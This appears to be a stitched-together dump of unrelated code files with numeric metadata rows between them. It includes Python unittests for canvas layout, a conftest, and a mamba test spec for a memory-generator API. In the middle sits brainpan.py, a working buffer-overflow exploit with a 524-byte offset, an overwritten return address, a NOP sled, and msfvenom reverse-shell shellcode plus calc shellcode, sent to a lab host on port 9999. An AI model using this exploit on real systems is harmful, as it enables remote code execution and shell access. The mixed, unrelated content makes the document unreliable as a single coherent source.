container = CanvasItem.CanvasItemComposition() # row layout
container.layout = CanvasItem.CanvasItemRowLayout()
item1 = CanvasItem.CanvasItemComposition()
item2 = CanvasItem.CanvasItemComposition()
column = CanvasItem.CanvasItemComposition()
column.layout = CanvasItem.CanvasItemColumnLayout()
column.add_stretch()
column.add_spacing(8)
item1.add_canvas_item(column)
container.add_canvas_item(item1)
container.add_canvas_item(item2)
canvas_item.layout = CanvasItem.CanvasItemColumnLayout()
canvas_item.add_canvas_item(container)
canvas_item.add_stretch()
canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=100, height=100), immediate=True)
# check that items use full container width (due to item2 not having preferred width)
self.assertIsNone(container.layout.get_sizing(container.canvas_items).preferred_width)
self.assertEqual(item1.canvas_size.width, 50)
self.assertEqual(item1.canvas_size.height, 50) # vertical is shared evenly between item1 and stretch
self.assertEqual(item2.canvas_size.width, 50)
self.assertEqual(item2.canvas_size.height, 50) # vertical is shared evenly between item2 and stretch
def test_repaint_immediate_paints_child_layers_and_their_elements_too(self):
outer_layer = CanvasItem.LayerCanvasItem()
with contextlib.closing(outer_layer):
inner_composition = CanvasItem.CanvasItemComposition()
inner_layer = CanvasItem.LayerCanvasItem()
test_canvas_item = TestCanvasItemClass.TestCanvasItem()
outer_layer.add_canvas_item(inner_composition)
inner_composition.add_canvas_item(inner_layer)
inner_layer.add_canvas_item(test_canvas_item)
outer_layer_repaint_count = outer_layer._repaint_count
inner_layer_repaint_count = inner_layer._repaint_count
test_canvas_item_repaint_count = test_canvas_item._repaint_count
outer_layer.repaint_immediate(DrawingContext.DrawingContext(), Geometry.IntSize(100, 100))
self.assertEqual(outer_layer_repaint_count + 1, outer_layer._repaint_count)
self.assertEqual(inner_layer_repaint_count + 1, inner_layer._repaint_count)
self.assertEqual(test_canvas_item_repaint_count + 1, test_canvas_item._repaint_count)
def test_repaint_threaded_paints_child_layers_and_their_elements_too(self):
CanvasItem._threaded_rendering_enabled = True
outer_layer = CanvasItem.LayerCanvasItem()
with contextlib.closing(outer_layer):
inner_composition = CanvasItem.CanvasItemComposition()
inner_layer = CanvasItem.LayerCanvasItem()
test_canvas_item = TestCanvasItemClass.TestCanvasItem()
outer_layer.add_canvas_item(inner_composition)
inner_composition.add_canvas_item(inner_layer)
inner_layer.add_canvas_item(test_canvas_item)
# update the outer layer with the initial size
outer_layer.update_layout(Geometry.IntPoint(), Geometry.IntSize(width=640, height=480))
# sleep a short time to allow thread to run
time.sleep(0.05)
# save the repaint counts
outer_layer_repaint_count = outer_layer._repaint_count
inner_layer_repaint_count = inner_layer._repaint_count
test_canvas_item_repaint_count = test_canvas_item._repaint_count
# update the canvas item and make sure everyone repaints
test_canvas_item.update()
# sleep a short time to allow thread to run
time.sleep(0.05)
# check the repaint counts were all incremented
self.assertEqual(outer_layer_repaint_count + 1, outer_layer._repaint_count)
self.assertEqual(inner_layer_repaint_count + 1, inner_layer._repaint_count)
self.assertEqual(test_canvas_item_repaint_count + 1, test_canvas_item._repaint_count)
def test_update_during_repaint_triggers_another_repaint(self):
CanvasItem._threaded_rendering_enabled = True
outer_layer = CanvasItem.LayerCanvasItem()
with contextlib.closing(outer_layer):
test_canvas_item = TestCanvasItemClass.TestCanvasItem()
test_canvas_item.repaint_delay = 0.05
outer_layer.add_canvas_item(test_canvas_item)
# update the outer layer with the initial size
outer_layer.update_layout(Geometry.IntPoint(), Geometry.IntSize(width=640, height=480), immediate=True)
# sleep a short time to allow thread to run
time.sleep(test_canvas_item.repaint_delay / 2)
test_canvas_item.update()
time.sleep(test_canvas_item.repaint_delay * 2)
self.assertEqual(test_canvas_item.repaint_count, 2)
if __name__ == '__main__':
logging.getLogger().setLevel(logging.DEBUG)
unittest.main()
| 65.657669
| 182
| 0.720132
| 13,352
| 107,022
| 5.510186
| 0.034527
| 0.124096
| 0.060675
| 0.04306
| 0.925434
| 0.908974
| 0.891535
| 0.87449
| 0.849698
| 0.832164
| 0
| 0.043366
| 0.17887
| 107,022
| 1,629
| 183
| 65.697974
| 0.79383
| 0.040786
| 0
| 0.689481
| 0
| 0
| 0.004059
| 0
| 0
| 0
| 0
| 0
| 0.239193
| 1
| 0.071326
| false
| 0.00072
| 0.005764
| 0.001441
| 0.080692
| 0.00072
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
2a6b9b57140482a1f62b8f1423c66cfad289eadd
| 4,143
|
py
|
Python
|
codes/brainpan.py
|
SkyBulk/exploit-development
|
0653997e264a9e9113f633b4de977a978d39e8c5
|
[
"MIT"
] | 18
|
2019-04-11T02:27:07.000Z
|
2022-01-24T09:53:13.000Z
|
codes/brainpan.py
|
SkyBulk/exploit-development
|
0653997e264a9e9113f633b4de977a978d39e8c5
|
[
"MIT"
] | null | null | null |
codes/brainpan.py
|
SkyBulk/exploit-development
|
0653997e264a9e9113f633b4de977a978d39e8c5
|
[
"MIT"
] | 11
|
2019-04-03T12:15:45.000Z
|
2022-03-23T15:02:32.000Z
|
#!/usr/bin/python
# tested on windows 7 x86 sp1
import socket
import struct
badchars = "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"
badchars += "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f"
badchars += "\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
badchars += "\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f"
badchars += "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f"
badchars += "\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf"
badchars += "\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf"
badchars += "\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.23 LPORT=4444 -f python -e x86/shikata_ga_nai -b "\x00"
shellcode = ""
shellcode += "\xdb\xc1\xba\x4f\x40\xb0\xd8\xd9\x74\x24\xf4\x5d"
shellcode += "\x2b\xc9\xb1\x52\x31\x55\x17\x83\xed\xfc\x03\x1a"
shellcode += "\x53\x52\x2d\x58\xbb\x10\xce\xa0\x3c\x75\x46\x45"
shellcode += "\x0d\xb5\x3c\x0e\x3e\x05\x36\x42\xb3\xee\x1a\x76"
shellcode += "\x40\x82\xb2\x79\xe1\x29\xe5\xb4\xf2\x02\xd5\xd7"
shellcode += "\x70\x59\x0a\x37\x48\x92\x5f\x36\x8d\xcf\x92\x6a"
shellcode += "\x46\x9b\x01\x9a\xe3\xd1\x99\x11\xbf\xf4\x99\xc6"
shellcode += "\x08\xf6\x88\x59\x02\xa1\x0a\x58\xc7\xd9\x02\x42"
shellcode += "\x04\xe7\xdd\xf9\xfe\x93\xdf\x2b\xcf\x5c\x73\x12"
shellcode += "\xff\xae\x8d\x53\x38\x51\xf8\xad\x3a\xec\xfb\x6a"
shellcode += "\x40\x2a\x89\x68\xe2\xb9\x29\x54\x12\x6d\xaf\x1f"
shellcode += "\x18\xda\xbb\x47\x3d\xdd\x68\xfc\x39\x56\x8f\xd2"
shellcode += "\xcb\x2c\xb4\xf6\x90\xf7\xd5\xaf\x7c\x59\xe9\xaf"
shellcode += "\xde\x06\x4f\xa4\xf3\x53\xe2\xe7\x9b\x90\xcf\x17"
shellcode += "\x5c\xbf\x58\x64\x6e\x60\xf3\xe2\xc2\xe9\xdd\xf5"
shellcode += "\x25\xc0\x9a\x69\xd8\xeb\xda\xa0\x1f\xbf\x8a\xda"
shellcode += "\xb6\xc0\x40\x1a\x36\x15\xc6\x4a\x98\xc6\xa7\x3a"
shellcode += "\x58\xb7\x4f\x50\x57\xe8\x70\x5b\xbd\x81\x1b\xa6"
shellcode += "\x56\x6e\x73\xa8\xaa\x06\x86\xa8\xa3\x8a\x0f\x4e"
shellcode += "\xa9\x22\x46\xd9\x46\xda\xc3\x91\xf7\x23\xde\xdc"
shellcode += "\x38\xaf\xed\x21\xf6\x58\x9b\x31\x6f\xa9\xd6\x6b"
shellcode += "\x26\xb6\xcc\x03\xa4\x25\x8b\xd3\xa3\x55\x04\x84"
shellcode += "\xe4\xa8\x5d\x40\x19\x92\xf7\x76\xe0\x42\x3f\x32"
shellcode += "\x3f\xb7\xbe\xbb\xb2\x83\xe4\xab\x0a\x0b\xa1\x9f"
shellcode += "\xc2\x5a\x7f\x49\xa5\x34\x31\x23\x7f\xea\x9b\xa3"
shellcode += "\x06\xc0\x1b\xb5\x06\x0d\xea\x59\xb6\xf8\xab\x66"
shellcode += "\x77\x6d\x3c\x1f\x65\x0d\xc3\xca\x2d\x3d\x8e\x56"
shellcode += "\x07\xd6\x57\x03\x15\xbb\x67\xfe\x5a\xc2\xeb\x0a"
shellcode += "\x23\x31\xf3\x7f\x26\x7d\xb3\x6c\x5a\xee\x56\x92"
shellcode += "\xc9\x0f\x73"
# pop calc.exe
shellcode = "\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
shellcode += "\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
shellcode += "\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
shellcode += "\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
shellcode += "\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
shellcode += "\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
shellcode += "\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC"
payload = 'A' * 524 + "\xf3\x12\x17\x31" + "\x90" * 16 + shellcode
try:
print "\nSending tons of random bytes..."
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(('192.168.0.28',9999))
s.recv(1024)
s.send(payload)
s.close()
print "\nDone! Wonder if we got that shell back?"
except:
print "Could not connect to 9999 for some reason..."
| 55.24
| 142
| 0.704079
| 848
| 4,143
| 3.432783
| 0.385613
| 0.006183
| 0.004809
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.240031
| 0.061791
| 4,143
| 74
| 143
| 55.986486
| 0.508876
| 0.040309
| 0
| 0
| 0
| 0.745763
| 0.746724
| 0.705645
| 0.016949
| 1
| 0
| 0
| 0
| 0
| null | null | 0
| 0.033898
| null | null | 0.050847
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
2a6d03a2aa24ea78b3fdae4a0208329118dca0e5
| 237
|
py
|
Python
|
AllTest/testall.py
|
VargaIonut23/cinema
|
108f8a67ea2002ed7cd0a9839ad2024af8bd64f3
|
[
"MIT"
] | null | null | null |
AllTest/testall.py
|
VargaIonut23/cinema
|
108f8a67ea2002ed7cd0a9839ad2024af8bd64f3
|
[
"MIT"
] | null | null | null |
AllTest/testall.py
|
VargaIonut23/cinema
|
108f8a67ea2002ed7cd0a9839ad2024af8bd64f3
|
[
"MIT"
] | null | null | null |
from AllTest.test_all_service import test_All_Service
from AllTest.testdomain import test_domain
from AllTest.testrepository import test_all_repository
def test_all():
test_domain()
test_all_repository()
test_All_Service()
| 23.7
| 54
| 0.818565
| 33
| 237
| 5.484848
| 0.333333
| 0.232044
| 0.232044
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.130802
| 237
| 9
| 55
| 26.333333
| 0.878641
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.142857
| true
| 0
| 0.428571
| 0
| 0.571429
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
2a7465b4ef95b6caa84ab8dd772a2360229c2aaa
| 25
|
py
|
Python
|
cursoemvideo/python3_mundo3/aula_22/desafios aula 22/ex112/__init__.py
|
Tiago-Baptista/CursoEmVideo_Python3
|
381044e66594362a3767a776530c2ba7dc02dcf2
|
[
"MIT"
] | null | null | null |
cursoemvideo/python3_mundo3/aula_22/desafios aula 22/ex112/__init__.py
|
Tiago-Baptista/CursoEmVideo_Python3
|
381044e66594362a3767a776530c2ba7dc02dcf2
|
[
"MIT"
] | null | null | null |
cursoemvideo/python3_mundo3/aula_22/desafios aula 22/ex112/__init__.py
|
Tiago-Baptista/CursoEmVideo_Python3
|
381044e66594362a3767a776530c2ba7dc02dcf2
|
[
"MIT"
] | null | null | null |
import moeda
import dado
| 8.333333
| 12
| 0.84
| 4
| 25
| 5.25
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.16
| 25
| 2
| 13
| 12.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
2a8c8bbc43f74d59816034a4fbeb35c3f24cb4d1
| 178
|
py
|
Python
|
project/conftest.py
|
westnetz/anschluss
|
fbe5f8b1b7f64b2b042ecdda3e56dc0cc91e1048
|
[
"MIT"
] | 3
|
2019-03-20T17:54:59.000Z
|
2019-07-04T07:11:47.000Z
|
project/conftest.py
|
westnetz/anschluss
|
fbe5f8b1b7f64b2b042ecdda3e56dc0cc91e1048
|
[
"MIT"
] | 50
|
2019-03-21T19:13:43.000Z
|
2019-10-09T17:42:58.000Z
|
project/conftest.py
|
westnetz/anschluss
|
fbe5f8b1b7f64b2b042ecdda3e56dc0cc91e1048
|
[
"MIT"
] | null | null | null |
import os
import configurations
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "project.settings")
os.environ.setdefault("DJANGO_CONFIGURATION", "Test")
configurations.setup()
| 25.428571
| 67
| 0.820225
| 20
| 178
| 7.15
| 0.6
| 0.125874
| 0.265734
| 0.34965
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.05618
| 178
| 6
| 68
| 29.666667
| 0.85119
| 0
| 0
| 0
| 0
| 0
| 0.348315
| 0.123596
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.4
| 0
| 0.4
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
aa71d7e15501ababcb044b9a7449ed0a1563ebc7
| 35,569
|
py
|
Python
|
tests/aat/spec/memory_spec.py
|
gchagnotSpt/openperf
|
0ae14cb7a685b1b059f707379773fb3bcb421d40
|
[
"Apache-2.0"
] | 20
|
2019-12-04T01:28:52.000Z
|
2022-03-17T14:09:34.000Z
|
tests/aat/spec/memory_spec.py
|
gchagnotSpt/openperf
|
0ae14cb7a685b1b059f707379773fb3bcb421d40
|
[
"Apache-2.0"
] | 115
|
2020-02-04T21:29:54.000Z
|
2022-02-17T13:33:51.000Z
|
tests/aat/spec/memory_spec.py
|
gchagnotSpt/openperf
|
0ae14cb7a685b1b059f707379773fb3bcb421d40
|
[
"Apache-2.0"
] | 16
|
2019-12-03T16:41:18.000Z
|
2021-11-06T04:44:11.000Z
|
import os
import time
import client.api
import client.models
from mamba import description, before, after, it
from expects import *
from expects.matchers import Matcher
from common import Config, Service
from common.helper import (make_dynamic_results_config,
check_modules_exists,
get_memory_dynamic_results_fields,
memory_generator_model,
wait_for_buffer_initialization_done)
from common.matcher import (has_location,
has_json_content_type,
raise_api_exception,
be_valid_memory_info,
be_valid_memory_generator,
be_valid_memory_generator_result,
be_valid_dynamic_results)
CONFIG = Config(os.path.join(os.path.dirname(__file__),
os.environ.get('MAMBA_CONFIG', 'config.yaml')))
with description('Memory Generator Module', 'memory') as self:
with before.all:
service = Service(CONFIG.service())
self._process = service.start()
self._api = client.api.MemoryGeneratorApi(service.client())
if not check_modules_exists(service.client(), 'memory'):
self.skip()
with after.all:
try:
for gen in self.api.list_memory_generators():
if gen.running:
self.api.stop_memory_generator(gen.id)
self.api.delete_memory_generator(gen.id)
except AttributeError:
pass
try:
self._process.terminate()
self._process.wait()
except AttributeError:
pass
with description('Information'):
with description('/memory-info'):
with context('PUT'):
with it('not allowed (405)'):
expect(lambda: self._api.api_client.call_api('/memory-info', 'PUT')).to(
raise_api_exception(405, headers={'Allow': "GET"}))
with context('GET'):
with before.all:
self._result = self._api.memory_info_with_http_info(
_return_http_data_only=False)
with it('success (200)'):
expect(self._result[1]).to(equal(200))
with it('has Content-Type: application/json header'):
expect(self._result[2]).to(has_json_content_type)
with it('valid memory info'):
expect(self._result[0]).to(be_valid_memory_info)
with description('Memory Generators'):
with description('/memory-generators'):
with context('PUT'):
with it('not allowed (405)'):
expect(lambda: self._api.api_client.call_api('/memory-generators', 'PUT')).to(
raise_api_exception(405, headers={'Allow': "GET, POST"}))
with context('POST'):
with shared_context('create generator'):
with before.all:
self._result = self._api.create_memory_generator_with_http_info(
self._model, _return_http_data_only=False)
with after.all:
self._api.delete_memory_generator(self._result[0].id)
with it('created (201)'):
expect(self._result[1]).to(equal(201))
with it('has valid Location header'):
expect(self._result[2]).to(has_location('/memory-generators/' + self._result[0].id))
with it('has Content-Type: application/json header'):
expect(self._result[2]).to(has_json_content_type)
with it('returned valid generator'):
expect(self._result[0]).to(be_valid_memory_generator)
with it('has same config'):
if (not self._model.id):
self._model.id = self._result[0].id
self._model.init_percent_complete = self._result[0].init_percent_complete
expect(self._result[0]).to(equal(self._model))
with description('with empty ID'):
with before.all:
self._model = memory_generator_model(self._api.api_client)
with included_context('create generator'):
with it('random ID assigned'):
expect(self._result[0].id).not_to(be_empty)
with description('with specified ID'):
with before.all:
self._model = memory_generator_model(
self._api.api_client, id='some-specified-id')
with included_context('create generator'):
pass
with context('GET'):
with before.all:
model = memory_generator_model(self._api.api_client)
self._g8s = [self._api.create_memory_generator(model)
for a in range(3)]
self._result = self._api.list_memory_generators_with_http_info(
_return_http_data_only=False)
with after.all:
for g7r in self._g8s:
self._api.delete_memory_generator(g7r.id)
with it('success (200)'):
expect(self._result[1]).to(equal(200))
with it('has Content-Type: application/json header'):
expect(self._result[2]).to(has_json_content_type)
with it('return list'):
expect(self._result[0]).not_to(be_empty)
expect(len(self._result[0])).to(equal(len(self._g8s)))
for gen in self._result[0]:
expect(gen).to(be_valid_memory_generator)
with description('/memory-generators/{id}'):
with before.all:
model = memory_generator_model(self._api.api_client)
self._g7r = self._api.create_memory_generator(model)
expect(self._g7r).to(be_valid_memory_generator)
with after.all:
self._api.delete_memory_generator(self._g7r.id)
with context('GET'):
with description('by existing ID'):
with before.all:
self._result = self._api.get_memory_generator_with_http_info(
self._g7r.id, _return_http_data_only=False)
with it('success (200)'):
expect(self._result[1]).to(equal(200))
with it('has Content-Type: application/json header'):
expect(self._result[2]).to(has_json_content_type)
with it('generator object'):
expect(self._result[0]).to(be_valid_memory_generator)
with description('by non-existent ID'):
with it('not found (404)'):
expr = lambda: self._api.get_memory_generator('unknown')
expect(expr).to(raise_api_exception(404))
with description('by invalid ID'):
with it('bad request (400)'):
expr = lambda: self._api.get_memory_generator('bad_id')
expect(expr).to(raise_api_exception(400))
with context('DELETE'):
with description('by existing ID'):
with shared_context('delete generator'):
with it('deleted (204)'):
result = self._api.delete_memory_generator_with_http_info(
self._g7r.id, _return_http_data_only=False)
expect(result[1]).to(equal(204))
with it('not found (404)'):
expr = lambda: self._api.get_memory_generator(self._g7r.id)
expect(expr).to(raise_api_exception(404))
with description('not running generator'):
with before.all:
model = memory_generator_model(
self._api.api_client, running = False)
self._g7r = self._api.create_memory_generator(model)
expect(self._g7r).to(be_valid_memory_generator)
with it('not running'):
result = self._api.get_memory_generator(self._g7r.id)
expect(result.running).to(be_false)
with included_context('delete generator'):
pass
with description('running generator'):
with before.all:
model = memory_generator_model(
self._api.api_client, running = True)
self._g7r = self._api.create_memory_generator(model)
expect(self._g7r).to(be_valid_memory_generator)
with it('running'):
result = self._api.get_memory_generator(self._g7r.id)
expect(result.running).to(be_true)
with included_context('delete generator'):
pass
with description('by non-existent ID'):
with it('not found (404)'):
expr = lambda: self._api.delete_memory_generator('unknown')
expect(expr).to(raise_api_exception(404))
with description('by invalid ID'):
with it('bad request (400)'):
expr = lambda: self._api.delete_memory_generator('bad_id')
expect(expr).to(raise_api_exception(400))
with description('/memory-generators/{id}/start'):
with before.all:
model = memory_generator_model(self._api.api_client)
self._g7r = self._api.create_memory_generator(model)
expect(self._g7r).to(be_valid_memory_generator)
expect(wait_for_buffer_initialization_done(self._api, self._g7r.id, 10)).to(be_true)
with after.all:
self._api.delete_memory_generator(self._g7r.id)
with context('POST'):
with description('by existing ID'):
with before.all:
self._result = self._api.start_memory_generator_with_http_info(
self._g7r.id, _return_http_data_only=False)
with shared_context('start generator'):
with it('is not running'):
expect(self._g7r.running).to(be_false)
with it('started (201)'):
expect(self._result[1]).to(equal(201))
with it('has valid Location header'):
expect(self._result[2]).to(has_location('/memory-generator-results/' + self._result[0].id))
with it('has Content-Type: application/json header'):
expect(self._result[2]).to(has_json_content_type)
with it('returned valid result'):
expect(self._result[0]).to(be_valid_memory_generator_result)
expect(self._result[0].active).to(be_true)
expect(self._result[0].generator_id).to(equal(self._g7r.id))
with it('is running'):
g7r = self._api.get_memory_generator(self._g7r.id)
expect(g7r).to(be_valid_memory_generator)
expect(g7r.running).to(be_true)
with included_context('start generator'):
pass
with description('already running generator'):
with it('bad request (400)'):
expr = lambda: self._api.start_memory_generator(self._g7r.id)
expect(expr).to(raise_api_exception(400))
with description('with Dynamic Results'):
with before.all:
self._api.stop_memory_generator(self._g7r.id)
dynamic = make_dynamic_results_config(
get_memory_dynamic_results_fields())
self._result = self._api.start_memory_generator_with_http_info(
self._g7r.id, dynamic_results=dynamic, _return_http_data_only=False)
with included_context('start generator'):
with it('has valid dynamic results'):
expect(self._result[0].dynamic_results).to(be_valid_dynamic_results)
with description('by non-existent ID'):
with it('not found (404)'):
expr = lambda: self._api.start_memory_generator('unknown')
expect(expr).to(raise_api_exception(404))
with description('by invalid ID'):
with it('bad request (400)'):
expr = lambda: self._api.start_memory_generator('bad_id')
expect(expr).to(raise_api_exception(400))
with description('/memory-generators/{id}/stop'):
with before.all:
model = memory_generator_model(
self._api.api_client, running=True)
self._g7r = self._api.create_memory_generator(model)
expect(self._g7r).to(be_valid_memory_generator)
expect(wait_for_buffer_initialization_done(self._api, self._g7r.id, 10)).to(be_true)
with after.all:
self._api.delete_memory_generator(self._g7r.id)
with context('POST'):
with description('by existing ID'):
with it('is running'):
expect(self._g7r.running).to(be_true)
with it('stopped (204)'):
result = self._api.stop_memory_generator_with_http_info(
self._g7r.id, _return_http_data_only=False)
expect(result[1]).to(equal(204))
with it('is not running'):
g7r = self._api.get_memory_generator(self._g7r.id)
expect(g7r).to(be_valid_memory_generator)
expect(g7r.running).to(be_false)
with description('already stopped generator'):
with it('bad request (400)'):
expr = lambda: self._api.stop_memory_generator(self._g7r.id)
expect(expr).to(raise_api_exception(400))
with description('by non-existent ID'):
with it('not found (404)'):
expr = lambda: self._api.start_memory_generator('unknown')
expect(expr).to(raise_api_exception(404))
with description('by invalid ID'):
with it('bad request (400)'):
expr = lambda: self._api.start_memory_generator('bad_id')
expect(expr).to(raise_api_exception(400))
with description('Memory Generators bulk operations'):
with description('/memory-generators/x/bulk-create'):
with context('PUT'):
with it('not allowed (405)'):
expect(lambda: self._api.api_client.call_api('/memory-generators/x/bulk-create', 'PUT')).to(
raise_api_exception(405, headers={'Allow': "POST"}))
with description('POST'):
with before.all:
self._models = [
memory_generator_model(self._api.api_client),
memory_generator_model(self._api.api_client)
]
request = client.models.BulkCreateMemoryGeneratorsRequest(self._models)
self._result = self._api.bulk_create_memory_generators_with_http_info(
request, _return_http_data_only=False)
with after.all:
for g7r in self._result[0]:
self._api.delete_memory_generator(g7r.id)
with it('created (200)'):
expect(self._result[1]).to(equal(200))
with it('has Content-Type: application/json header'):
expect(self._result[2]).to(has_json_content_type)
with it('returned valid generator list'):
expect(self._result[0]).not_to(be_empty)
expect(len(self._result[0])).to(equal(len(self._models)))
for g7r in self._result[0]:
expect(g7r).to(be_valid_memory_generator)
with it('has same config'):
for idx in range(len(self._models)):
model = self._models[idx]
model.init_percent_complete = self._result[0][idx].init_percent_complete
if (not model.id):
model.id = self._result[0][idx].id
expect(self._result[0][idx]).to(equal(model))
with description('/memory-generators/x/bulk-delete'):
with context('PUT'):
with it('not allowed (405)'):
expect(lambda: self._api.api_client.call_api('/memory-generators/x/bulk-delete', 'PUT')).to(
raise_api_exception(405, headers={'Allow': "POST"}))
with context('POST'):
with before.all:
self._ids = []
self._model = memory_generator_model(
self._api.api_client, running=False)
with shared_context('delete generators'):
with before.all:
self._g8s = [
self._api.create_memory_generator(self._model)
for i in range(3)]
with it('all exist'):
for g7r in self._g8s:
result = self._api.get_memory_generator(g7r.id)
expect(result).to(be_valid_memory_generator)
with it('no content (204)'):
request = client.models.BulkDeleteCpuGeneratorsRequest(
[g7r.id for g7r in self._g8s] + self._ids)
result = self._api.bulk_delete_memory_generators_with_http_info(
request, _return_http_data_only=False)
expect(result[1]).to(equal(204))
with it('all deleted'):
for g7r in self._g8s:
result = lambda: self._api.get_memory_generator(g7r.id)
expect(result).to(raise_api_exception(404))
with description('with existing IDs'):
with included_context('delete generators'):
pass
with description('with non-existent ID'):
with before.all:
self._ids = ['unknown']
with included_context('delete generators'):
pass
with description('with invalid ID'):
with before.all:
self._ids = ['bad_id']
with included_context('delete generators'):
pass
with description('/memory-generators/x/bulk-start'):
with context('PUT'):
with it('not allowed (405)'):
expect(lambda: self._api.api_client.call_api('/memory-generators/x/bulk-start', 'PUT')).to(
raise_api_exception(405, headers={'Allow': "POST"}))
with description('POST'):
with before.all:
model = memory_generator_model(self._api.api_client)
self._g8s = [
self._api.create_memory_generator(model)
for a in range(3)]
for a in range(3):
expect(wait_for_buffer_initialization_done(self._api, self._g8s[a].id, 10)).to(be_true)
with after.all:
request = client.models.BulkDeleteMemoryGeneratorsRequest(
[g7r.id for g7r in self._g8s])
self._api.bulk_delete_memory_generators(request)
with description('by existing IDs'):
with before.all:
request = client.models.BulkStartMemoryGeneratorsRequest(
[g7r.id for g7r in self._g8s])
self._result = self._api.bulk_start_memory_generators_with_http_info(
request, _return_http_data_only=False)
with it('is not running'):
for g7r in self._g8s:
expect(g7r.running).to(be_false)
with it('success (200)'):
expect(self._result[1]).to(equal(200))
with it('has Content-Type: application/json header'):
expect(self._result[2]).to(has_json_content_type)
with it('returned valid results'):
for result in self._result[0]:
expect(result).to(be_valid_memory_generator_result)
expect(result.active).to(be_true)
with it('all started'):
for g7r in self._g8s:
result = self._api.get_memory_generator(g7r.id)
expect(result).to(be_valid_memory_generator)
expect(result.running).to(be_true)
with description('already running generators'):
with it('bad request (400)'):
request = client.models.BulkStartMemoryGeneratorsRequest(
[g7r.id for g7r in self._g8s])
expr = lambda: self._api.bulk_start_memory_generators(request)
expect(expr).to(raise_api_exception(400))
with it('state was not changed'):
for g7r in self._g8s:
result = self._api.get_memory_generator(g7r.id)
expect(result).to(be_valid_memory_generator)
expect(result.running).to(be_true)
with description('with non-existant ID'):
with before.all:
for num, g7r in enumerate(self._g8s, start=1):
try:
if (num % 2) == 0:
g7r.running = False
